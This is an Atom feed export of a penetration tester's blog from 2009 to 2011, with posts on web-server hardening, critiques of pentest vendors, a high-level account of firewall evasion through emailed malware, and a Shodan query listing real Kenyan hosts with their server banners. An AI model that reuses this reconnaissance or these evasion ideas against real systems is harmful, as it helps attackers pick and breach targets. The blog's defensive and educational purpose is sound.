/&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;REMOVE SPECIAL FILES/FOLDERS.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Sometimes developers like to have files like phpinfo. These files expose paths to web folders, server kernels and internal IPs. Was doing a Pentest last year where i found one. Prior to that, i had no idea that the webservers had connectivity to internal business networks. The internal security personnel had no idea either, so during the test, i found one on a server and it had an internal connectivity. That's when i released the Admins had deployed internal IPs to the network for easier access of the Webservers. So these phpinfo files, remove them. Other folders are like /phpmyadmin, /mysql, /admin etc which need to be blocked from the public.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;BLOCK DIRECTORY LISTING.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Directory listing is on immature mistake developers and webmasters make. Most of the Apache servers will have these turned on. Inside httpd.conf, edit Options Indexes FollowSymLinks to Options -Indexes FollowSymLinks.&lt;br /&gt;&lt;br /&gt;The other security fixes are much more exercised by Security Personnel in your organization. These will include Code analysis, Checklists, Top Owasp risks test, Penetration testing, Vulnerability Assessments etc.&lt;br /&gt;&lt;br /&gt;Any questions, comments, please post below.&lt;br /&gt;&lt;br /&gt;Regards,&lt;br /&gt;&lt;br /&gt;./Chucks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-9116049723890504521?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/9116049723890504521/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=9116049723890504521' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9116049723890504521'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9116049723890504521'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/02/yes-old-friend-scanned-site.html' title='Yes, An old Friend scanned the site...'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-5L0NnFxQLv4/TVv3DhZOPlI/AAAAAAAAAcw/Sqr2aFiadZI/s72-c/scanasite.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6786823569659208458</id><published>2011-02-10T11:34:00.008+03:00</published><updated>2011-02-10T18:26:41.700+03:00</updated><title type='text'>Why PT without FW/IPS Evasion is not reliable Part 1</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/TVOnz3KdJpI/AAAAAAAAAcg/MDDZ1VomjPk/s1600/workx.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 294px; height: 223px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/TVOnz3KdJpI/AAAAAAAAAcg/MDDZ1VomjPk/s400/workx.jpg" alt="" id="BLOGGER_PHOTO_ID_5571981673410406034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Many attackers out there, Cyber armies, black hats, Investigators  etc, who want data from your Network/Infrastructure will stop at nothing to try evade all Access Controls that cooperates have. Due to this, its the responsibility of security companies hired to demonstrate this vulnerability and try to recommend many ways of blocking the security flaws that can be used for FW/IPDS evasion.&lt;br /&gt;&lt;br /&gt;On the picture shown is one example. Here, an attacker with a laptop sitting somewhere sends a Malware to a user inside the network. So all he will need to do is to wait for the user to open his document that was attached on mail, and he will run code on the victim and a tunneled control channel is applied via the Firewalls to his box. This is well achieved via ssl-tunneling.&lt;br /&gt;&lt;br /&gt;I have taken sometime to test this attack on several banks in Kenya, and it was well achieved unlike try outs in Fast world countries, which needs more recon of IPDS sensors and Firewalls. I will be continuing this with Part two in the coming week.&lt;br /&gt;&lt;br /&gt;For questions, check  below.&lt;br /&gt;&lt;br /&gt;Regards,&lt;br /&gt;&lt;br /&gt;Chucks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6786823569659208458?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6786823569659208458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6786823569659208458' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6786823569659208458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6786823569659208458'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/02/why-pt-with-fwips-evasion-is-not.html' title='Why PT without FW/IPS Evasion is not reliable Part 1'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/TVOnz3KdJpI/AAAAAAAAAcg/MDDZ1VomjPk/s72-c/workx.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-401723471451047000</id><published>2011-01-30T21:58:00.002+03:00</published><updated>2011-01-30T22:15:34.633+03:00</updated><title type='text'>If They scan and paste, why not just buy the tool!</title><content type='html'>As an Infosec specialist, you might have worked with tools like Nessus, Appscan, Acunetic etc. Well these tools kind of give a pentester an easy time during an engagement.&lt;br /&gt;&lt;br /&gt;Organization throughout the world who have security departments that test vulnerabilities in a daily basis use the same tools for easier scans on their subnets, but they also contract Security Specialists for a view above the scope. Its more money on their budgets so they always expect a better addition of the value they are procuring for.&lt;br /&gt;&lt;br /&gt;The other day, i was looking at some reports done by a very powerful company that specializes with AV (Anti-virus)and also on with PT(Penetration Testing). From such AV cooperations i was expecting real good reports but all i could see were copy pastes from Nessus plugins. Many question unanswered there......&lt;br /&gt;&lt;br /&gt;One of the questions i asked myself was, why not just buy a scanner and leave it running for your report?&lt;br /&gt;&lt;br /&gt;Another question that truly comes up is, will the bad guys be doing the same?&lt;br /&gt;&lt;br /&gt;Anyone who has answers, please post below.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-401723471451047000?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/401723471451047000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=401723471451047000' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/401723471451047000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/401723471451047000'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/01/if-they-scan-and-paste-why-not-just-buy.html' title='If They scan and paste, why not just buy the tool!'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-5256723365910630089</id><published>2011-01-16T10:16:00.003+03:00</published><updated>2011-01-16T10:30:50.234+03:00</updated><title type='text'>Before PT, Call-inject</title><content type='html'>Just before a PT Op, clients who understand PT and VA will tend to call, maybe via management or even with their Technical Security Departments, and will ask you as the pentester several questions, maybe about Owasp, methodologies, tools, etc During this session, i tend to listen and also ask questions cause they tend to also  lead to Pre-Infor gathering just before the projects.&lt;br /&gt;&lt;br /&gt;This actually worked some months ago last year, when doing a PT on a big organization which was using Windows Domain Controllers and was also reachable via the internet. This wasnt to be figured out before the operation, it was to, after negotiations and the start of work.&lt;br /&gt;&lt;br /&gt;Companies should be aware of such errors/flaws/human weaknesses, due to the fact that, the pentesters who dont win the bids tend not to be unhappy, and may have discovered that information via the phone-calls.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-5256723365910630089?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/5256723365910630089/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=5256723365910630089' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5256723365910630089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5256723365910630089'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/01/before-pt-call-inject.html' title='Before PT, Call-inject'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-5275502008341572674</id><published>2010-10-07T17:51:00.003+03:00</published><updated>2010-10-07T18:09:32.237+03:00</updated><title type='text'>playing tigerteam at the end of SecureICT talks</title><content type='html'>Tigerteam, a TV show about pentesting, released back into 2007 was screened at SecureICT conference on 6th, in the evening. Tigerteam, composes of Nickerson Chris, Ryan Jones and Luke McOmie, shows them break into targets they are hired to by their clients. Attacks include exploitation of Human vulnerability, technological attacks, physical attacks etc.&lt;br /&gt;&lt;br /&gt;&lt;object width="320" height="266" class="BLOG_video_class" id="BLOG_video-d908cdc0e7b83c79" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"&gt;&lt;param name="movie" value="http://www.youtube.com/get_player"&gt;&lt;param name="bgcolor" value="#FFFFFF"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;param name="flashvars" value="flvurl=http://v3.nonxt7.googlevideo.com/videoplayback?id%3Dd908cdc0e7b83c79%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331405045%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D609195E3DF8D7E075146F2C6C15884631BE431EE.2133CB24D2602FB42685C8D2352B953B790F4288%26key%3Dck1&amp;amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3Dd908cdc0e7b83c79%26offsetms%3D5000%26itag%3Dw160%26sigh%3DKZCQa17hrhuMnndeWwNI4pNO_Zg&amp;amp;autoplay=0&amp;amp;ps=blogger"&gt;&lt;embed src="http://www.youtube.com/get_player" type="application/x-shockwave-flash"width="320" height="266" bgcolor="#FFFFFF"flashvars="flvurl=http://v3.nonxt7.googlevideo.com/videoplayback?id%3Dd908cdc0e7b83c79%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331405045%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D609195E3DF8D7E075146F2C6C15884631BE431EE.2133CB24D2602FB42685C8D2352B953B790F4288%26key%3Dck1&amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3Dd908cdc0e7b83c79%26offsetms%3D5000%26itag%3Dw160%26sigh%3DKZCQa17hrhuMnndeWwNI4pNO_Zg&amp;autoplay=0&amp;ps=blogger"allowFullScreen="true" /&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-5275502008341572674?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='video/mp4' href='http://www.blogger.com/video-play.mp4?contentId=d908cdc0e7b83c79&amp;type=video%2Fmp4' length='0'/><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/5275502008341572674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=5275502008341572674' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5275502008341572674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5275502008341572674'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2010/10/playing-tigerteam-at-end-of-secureict.html' title='playing tigerteam at the end of SecureICT talks'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-2692036867727869828</id><published>2010-10-05T17:37:00.005+03:00</published><updated>2010-10-06T08:19:25.864+03:00</updated><title type='text'>Bad Security Service adds up sum to Losses after a threat succeeds</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/TKtqCxVInmI/AAAAAAAAAbo/dOYqgKOcFC8/s1600/pentester+desk.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 285px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/TKtqCxVInmI/AAAAAAAAAbo/dOYqgKOcFC8/s400/pentester+desk.jpg" alt="" id="BLOGGER_PHOTO_ID_5524625963734310498" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;One funny thing i have learned is that several Security Vendors dont really test security effectively even when contracted to do so. Others may say its more of jurisdiction purposes or the scope, but i think if you are paid to minimize risks for a corporation you should do it at the best value possible.&lt;br /&gt;&lt;br /&gt;This comes to the topic pentest. A lot of the vendors don't understand what pentest is and thus, that affects their clients, so leaving them at a greater risk due to the fact they leave, telling them they are secure and so letting them, let gaurd down.&lt;br /&gt;&lt;br /&gt;One of the Pentest report i got hold of was explaining how there were open ports which they dint or were not able to exploit but had holes as seen from a scanner. To keep it short, should a pentest report have False positives. No, its should have info on entries that were used to get into the target.&lt;br /&gt;&lt;br /&gt;They problem is that the above may require a team which is qualified, talented, intelligent and advanced in the field. Lemmie know your thoughts&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-2692036867727869828?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/2692036867727869828/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=2692036867727869828' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2692036867727869828'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2692036867727869828'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2010/10/bad-security-service-adds-up-sum-to.html' title='Bad Security Service adds up sum to Losses after a threat succeeds'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/TKtqCxVInmI/AAAAAAAAAbo/dOYqgKOcFC8/s72-c/pentester+desk.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7465260281420475536</id><published>2010-09-11T11:04:00.003+03:00</published><updated>2010-09-11T11:14:09.768+03:00</updated><title type='text'>Kenya Banking infoinsecurity</title><content type='html'>Hi Guys.&lt;br /&gt;&lt;br /&gt;SecureICT dates were changed to 5th and 6th of October.&lt;br /&gt;&lt;br /&gt;I will also be doing a presentation on the above topic, where my main concerns will be on Internet banking, Mobile Banking, Bank Vendors, Physical and operational Security in banking, and several other topics which  over the year 2010 i experienced.&lt;br /&gt;&lt;br /&gt;This was inspired after a Head of Information security in a certain bank told me that they rely on TRUST.&lt;br /&gt;&lt;br /&gt;See you there.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7465260281420475536?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7465260281420475536/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7465260281420475536' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7465260281420475536'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7465260281420475536'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2010/09/kenya-banking-infoinsecurity.html' title='Kenya Banking infoinsecurity'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6579946266818817318</id><published>2010-09-01T22:18:00.003+03:00</published><updated>2010-09-01T22:27:21.252+03:00</updated><title type='text'>SecureICT 2010</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/TH6or5Fig7I/AAAAAAAAAbY/91Xc1T2uWus/s1600/secureitc_banner.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 80px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/TH6or5Fig7I/AAAAAAAAAbY/91Xc1T2uWus/s400/secureitc_banner.jpg" alt="" id="BLOGGER_PHOTO_ID_5512028465959961522" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Awesome, seven days to SecureICT.PanAfric from 8th to 9th this Month. John Long, with Google Hacking, Lucy Munga from E and Y with Information Risk and Assurance Services. Dr Bitange will be opening the conference, hope to see you all there.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6579946266818817318?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6579946266818817318/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6579946266818817318' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6579946266818817318'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6579946266818817318'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2010/09/secureict-2010.html' title='SecureICT 2010'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/TH6or5Fig7I/AAAAAAAAAbY/91Xc1T2uWus/s72-c/secureitc_banner.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-5335031349149732361</id><published>2010-01-13T17:16:00.007+03:00</published><updated>2010-01-13T21:09:24.784+03:00</updated><title type='text'>Info Security in 2010, my predections</title><content type='html'>Its a new year again, and we heard so much noise around and there, eg the big Google hacked by China hackers and several governments getting heavily ready on Cyber security. My predictions will heavily involve where i come from, Kenya.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Kenyan Banks&lt;/span&gt; will start taking Information security serious and security assessment will be actively deployed as part of security policies.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Kenyan media&lt;/span&gt; will investigate more on the topic and we will see several blog post and stories being written.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Cyber crime&lt;/span&gt; will heighten up as &lt;span style="font-weight: bold;"&gt;Mobile Banking and Internet Banking&lt;/span&gt; becomes deployed and high tech crime will be cause of the new venture for armed robbery.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Mungiki&lt;/span&gt; and other Secs will take Cyber terror, spying and espionage for more gain as the year proceeds.&lt;br /&gt;&lt;br /&gt;A &lt;span style="font-weight: bold;"&gt;strong Police Cyber Crime&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;unit&lt;/span&gt; to be deployed as the year rolls out&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Compiled by Chuks&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-5335031349149732361?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/5335031349149732361/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=5335031349149732361' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5335031349149732361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5335031349149732361'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2010/01/info-security-in-2010-my-prodections.html' title='Info Security in 2010, my predections'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8709841232484662317</id><published>2009-11-27T14:05:00.007+03:00</published><updated>2009-11-27T14:26:46.942+03:00</updated><title type='text'>Computer search, scan the internet</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_J9LOpyWWr2o/Sw-0iNCt_JI/AAAAAAAAAaE/8EbcT9dbPTg/s1600/shodan.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 192px;" src="http://3.bp.blogspot.com/_J9LOpyWWr2o/Sw-0iNCt_JI/AAAAAAAAAaE/8EbcT9dbPTg/s400/shodan.png" alt="" id="BLOGGER_PHOTO_ID_5408740177204870290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;There is this new tool done by Achillean, you can follow him in twitter, http://twitter.com/achillean that enables to search for system across the internet by issuing command searches on his site, http://shodan.surtri.com/. At  the time of this blog post, the app is still running at BETA stage, which acts like an nmap search of systems online.&lt;br /&gt;&lt;br /&gt;You can use keywords like, country code, port number, host name , etc.&lt;br /&gt;&lt;br /&gt;Doing a scan of some systems here in Kenya, Apache webservers, having port 80 open, and registered as a co.ke would have a key search as,  apache:KE port:80 hostname:co.ke&lt;br /&gt;&lt;br /&gt;The first page...&lt;br /&gt;&lt;div id="main"&gt;&lt;div id="search"&gt;&lt;br /&gt;Results 1 - 8 of about 8 for apache:KE port:80 hostname:co.ke&lt;br /&gt;41.220.233.2&lt;br /&gt;Added on 06.11.2009&lt;br /&gt;&lt;br /&gt;mail.kdn.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Fri, 06 Nov 2009 18:22:43 GMT&lt;br /&gt;Server: Apache/2.2.8 (EL)&lt;br /&gt;Last-Modified: Fri, 26 Jun 2009 10:04:55 GMT&lt;br /&gt;ETag: "1fd811b-f5-46d3d78dc9fc0"&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Content-Length: 245&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=UTF-8&lt;br /&gt;&lt;br /&gt;41.207.64.4&lt;br /&gt;Added on 06.11.2009&lt;br /&gt;&lt;br /&gt;mtandao.infinet.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Fri, 06 Nov 2009 18:27:55 GMT&lt;br /&gt;Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.5 with Suhosin-Patch&lt;br /&gt;X-Powered-By: PHP/5.2.5&lt;br /&gt;Expires: Thu, 19 Nov 1981 08:52:00 GMT&lt;br /&gt;Last-Modified: Fri, 06 Nov 2009 18:27:55 GMT&lt;br /&gt;Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0&lt;br /&gt;Pragma: no-cache&lt;br /&gt;Set-Cookie: PHPSESSID=703d3af1219ebc948ad8a46d0b29eac5; path=/&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html&lt;br 